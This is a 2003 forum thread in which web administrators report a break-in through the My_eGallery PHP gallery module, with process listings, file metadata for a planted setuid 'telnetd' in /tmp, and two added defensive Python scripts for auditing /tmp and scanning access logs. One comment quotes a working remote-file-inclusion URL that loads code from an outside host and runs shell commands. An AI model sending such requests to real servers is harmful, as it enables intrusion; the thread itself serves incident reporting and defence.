Security Bug in My_eGallery 2.7.9
SecurityLaffer writes "I discovered that there seems to be a big security bug in My_eGallery and every day someone is exploiting and reinstalling some processes on my webserver. Very dangerous, because the Hacker uploads a file on the server and puts it in the /tmp directory and then can execute it (I do not know HOW by now!!!). But the LOGS show that the file is uploaded by My_eGallery...

If somebody has an idea????

Everybody should check his /tmp Directory for files with suspicious names like telnetd or bind.txt or files which have readable names. Look into those files if they are not Hacks...

I discovered the following processes on my server:
6926 ? S 0:00 getty
6932 ? T 0:00 ./telnetd
6933 ? S 0:00 getty
6936 ? Z 0:00 [telnetd ]
6939 ? T 0:00 ./telnetd
6940 ? S 0:00 getty
6942 ? Z 0:00 [telnetd ]
6947 ? S 0:00 getty
7005 ? T 0:00 ./telnetd
7006 ? S 0:00 getty
7009 ? Z 0:00 [telnetd ]
7012 ? T 0:00 ./telnetd
7013 ? S 0:00 getty
7016 ? Z 0:00 [telnetd ]

Then:

-----8<-----8<-----8<-----8<-----8<-----8<-----8<-----8<-----8<-----8<-----
?????:/tmp # stat telnetd
File: `telnetd'
Size: 170613 Blocks: 336 IO Block: 4096 Regular File
Device: 302h/770d Inode: 260574 Links: 1
Access: (7777/-rwsrwsrwt) Uid: ( 30/ wwwrun) Gid: (65534/ nogroup)
Access: 2003-11-18 22:52:41.000000000 +0100
Modify: 2003-02-07 18:35:31.000000000 +0100
Change: 2003-11-18 22:21:35.000000000 +0100
-----8<-----8<-----8<-----8<-----8<-----8<-----8<-----8<-----8<-----8<-----

Looking further:
002 30 6926 1 17 0 2012 488 schedu S ? 0:00 getty
SHELL=/bin/sh MAILTO=root
OLDPWD=/???/www/?????/www.????????.de/modules/My_eGallery/public
LD_LIBRARY_PATH=:/lib COLUMNS=80
PATH=/usr/bin:/usr/sbin:/sbin:/bin:/usr/lib/news/bin RUNLEVEL=3 PWD=/tmp
DAEMON=/usr/sbin/httpd PREVLEVEL=N LINES=24 DBROOT=/dev/null HOME=/root
SHLVL=4 LOGNAME=root ORACLE_HOME= _=./telnetd
002 30 6932 1 17 0 2008 452 do_sig T ? 0:00
./telnetd SHELL=/bin/sh MAILTO=root
OLDPWD=/???/www/??????/www.???????.de/modules/My_eGallery/public
LD_LIBRARY_PATH=:/lib COLUMNS=80
PATH=/usr/bin:/usr/sbin:/sbin:/bin:/usr/lib/news/bin RUNLEVEL=3 PWD=/tmp
DAEMON=/usr/sbin/httpd PREVLEVEL=N LINES=24 DBROOT=/dev/null HOME=/root
SHLVL=4 LOGNAME=root ORACLE_HOME= _=./telnetd
"
Posted on Wednesday, November 19 @ 09:47:39 CET by Zhen-Xjell
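
An added example, not part of the original post: a Python check for what the stat output above shows, a regular file under /tmp owned by the web server account with setuid, setgid or execute bits set. It flags by ownership and mode rather than by file name; the account name wwwrun comes from the post, and the demo tree and its file names are constructed.

```python
import os
import stat
import tempfile

# Mode bits worth flagging on a file the web server account owns in /tmp.
# The telnetd in the post had mode 7777: setuid, setgid, sticky, rwx for all.
FLAGS = [
    (stat.S_ISUID, "setuid"),
    (stat.S_ISGID, "setgid"),
    (stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH, "executable"),
]


def audit_dir(root, web_uid):
    """Return sorted (path, octal mode, reasons) for regular files under
    root that are owned by web_uid and are setuid, setgid or executable."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: do not follow planted symlinks
            except OSError:
                continue  # removed between listing and stat
            if not stat.S_ISREG(st.st_mode) or st.st_uid != web_uid:
                continue
            mode = stat.S_IMODE(st.st_mode)
            reasons = [label for bits, label in FLAGS if mode & bits]
            if reasons:
                findings.append((path, format(mode, "04o"), reasons))
    return sorted(findings)


def demo():
    """Constructed sample tree; the current user stands in for wwwrun."""
    with tempfile.TemporaryDirectory() as tmp:
        for name, mode in (("telnetd", 0o4755), ("sess_abc", 0o600)):
            path = os.path.join(tmp, name)
            with open(path, "w") as fh:
                fh.write("constructed sample\n")
            os.chmod(path, mode)
        return [(os.path.basename(p), m, r)
                for p, m, r in audit_dir(tmp, os.getuid())]


if __name__ == "__main__":
    import pwd  # wwwrun is the owner shown in the post's stat output
    for finding in audit_dir("/tmp", pwd.getpwnam("wwwrun").pw_uid):
        print(*finding)
```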

Re: Security Bug in My_eGallery 2.7.9 (Score: 1)
by Johan1982 on Wednesday, November 19 @ 10:26:28 CET
Somebody knows some solution on this?



Re: Security Bug in My_eGallery 2.7.9 (Score: 1)
by judas (judas_iscariote@piscola.com) on Wednesday, November 19 @ 10:40:13 CET
Hi:
In the past, I was helping a friend; his site files had disappeared, and the only suspicious thing was the My_egallery module. I checked the code, but I can't find the possible bug; maybe chatserv (if he is online again) can tell us something about it.
I believe my_egallery allows code execution in some buggy function...
Bye



Re: Security Bug in My_eGallery 2.7.9 (Score: 1)
by Jeruvy on Wednesday, November 19 @ 18:24:03 CET
For now at least I'd disable uploading. I never used eGallery as I didn't think it did enough sanitization compared to Coppermine. My only (crappy) suggestion would be to remove eGallery, and use Coppermine.

Not the best answer, but I'm also not interested in learning another module, I've already decided isn't in my best interests to use... =(

J.



Re: Security Bug in My_eGallery 2.7.9 (Score: 1)
by luisba on Friday, November 21 @ 05:18:38 CET
I have the same problem. I discovered that the line used is

/modules/My_eGallery/public/displayCategory.php?basepath=http://www.bywordonline.com/sc/app.txt?&cmd=cd%20/tmp;ls

or similar

and you can use it although you have disabled the module.

It's a very dangerous bug but I don't know how to stop it. I deleted the module My_eGallery.

I hope that above line can help.
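
An added example, not part of the original comment: detection logic for the request shape quoted above, run over access-log lines. It goes beyond the single URL in the comment by flagging any request to a file under the My_eGallery directory where any parameter value is a remote URL, percent-encoded or not; the log lines, addresses and host names are constructed.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Apache common/combined log format: client, timestamp, request line, status.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+)[^"]*" (\d{3})')
REMOTE_VALUE = re.compile(r"^\s*(?:https?|ftp)://", re.IGNORECASE)
MODULE_DIR = "/modules/my_egallery/"


def remote_include_hits(lines):
    """Return (client, status, script, param) for every request to a file
    under the My_eGallery directory whose parameter value is a remote URL."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not an access-log line in the expected format
        client, target, status = m.groups()
        parts = urlsplit(target)
        script = unquote(parts.path)
        if MODULE_DIR not in script.lower():
            continue
        # parse_qsl percent-decodes values, so http%3A%2F%2F... is caught too
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            if REMOTE_VALUE.match(value):
                hits.append((client, status, script, name))
    return hits


# Constructed sample lines: documentation addresses, placeholder host names.
SCRIPT = "/modules/My_eGallery/public/displayCategory.php"
SAMPLE_LOG = [
    '192.0.2.10 - - [21/Nov/2003:05:02:11 +0100] "GET ' + SCRIPT +
    '?basepath=http://remote.example/app.txt? HTTP/1.0" 200 512',
    '192.0.2.11 - - [21/Nov/2003:05:03:40 +0100] "GET ' + SCRIPT +
    '?basepath=HTTP%3A%2F%2Fremote.example%2Fapp.txt HTTP/1.0" 200 498',
    '192.0.2.12 - - [21/Nov/2003:05:04:02 +0100] "GET '
    '/modules.php?name=My_eGallery HTTP/1.1" 200 9120',
    '192.0.2.13 - - [21/Nov/2003:05:05:19 +0100] "GET '
    '/links.php?url=http://www.example.org/ HTTP/1.1" 302 0',
]

if __name__ == "__main__":
    for hit in remote_include_hits(SAMPLE_LOG):
        print(*hit)
```

A hit answered with status 200 is a reason to go through /tmp and the process list on that host.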




Re: Security Bug in My_eGallery 2.7.9 (Score: 1)
by Jeruvy on Thursday, November 27 @ 20:40:26 CET
NOTE: Bugtraq has released a vulnerability for eGallery. I have posted it for news, but it hasn't been made available as of yet.

In any case send me a msg if you want the link or go get it yourself on the bugtraq archives.




Re: Security Bug in My_eGallery 2.7.9 (Score: 1)
by Laffer on Friday, November 28 @ 10:10:28 CET
http://www.comicfan.de
I found the exec($cmd) lines in imageFunctions.php, but even when I commented out those lines, the exploit works... Crazy...

